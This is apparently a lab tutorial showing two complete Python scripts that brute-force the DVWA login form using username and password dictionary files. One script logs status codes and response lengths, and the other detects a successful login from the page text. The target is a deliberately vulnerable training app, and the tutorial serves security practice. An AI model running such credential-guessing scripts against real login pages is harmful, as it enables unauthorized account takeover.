Automate DVWA Brute‑Force Login with Python: Full Script & Results

The target machine is DVWA, suitable for the Low and Medium levels of the DVWA brute‑force module.

Key Code Explanation

url specifies the target URL.

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"

header sets the request headers.

header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Cookie': 'security=medium; PHPSESSID=geo7gb3ehf5gfnbhrvuqu545i7'
}

payload defines the request parameters.

payload = {'username': username, 'password': password, 'Login': 'Login'}

The following line sends a GET request and stores the response in Response.

Response = requests.get(url, params=payload, headers=header)

The script iterates over username and password dictionary files, performing a Cartesian‑product brute‑force attack, similar to Burp Suite’s Intruder “Cluster bomb”.

for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
        # process each username/password pair

Results (status code, username, password, response length) are written to a CSV file.

result = f"{Response.status_code},{username},{password},{len(Response.content)}"
f.write(result + "
")

Full Script – Method 1

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Cookie': 'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}

f = open('result.csv', 'w')
f.write('StatusCode,Username,Password,Length
')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username': username, 'password': password, 'Login': 'Login'}
        Response = requests.get(url, params=payload, headers=header)
        result = f"{Response.status_code},{username},{password},{len(Response.content)}"
        f.write(result + "
")
print("
Done")

Method 2

This method checks the response text for the phrase “Welcome to the password protected area” to determine successful login and writes valid credentials to a text file.

import requests

url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
header = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
    'Cookie': 'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}

f = open('result.txt', 'w')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
    for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
        username = admin.strip()
        password = line.strip()
        payload = {'username': username, 'password': password, 'Login': 'Login'}
        Response = requests.get(url, params=payload, headers=header)
        if 'Welcome to the password protected area' in Response.text:
            result = f"{username}:{password}"
            print(result)
            f.write(result + "
")
print("
Done")

Running the script produces network packets and CSV/TXT files showing status codes and response lengths, allowing identification of correct credentials.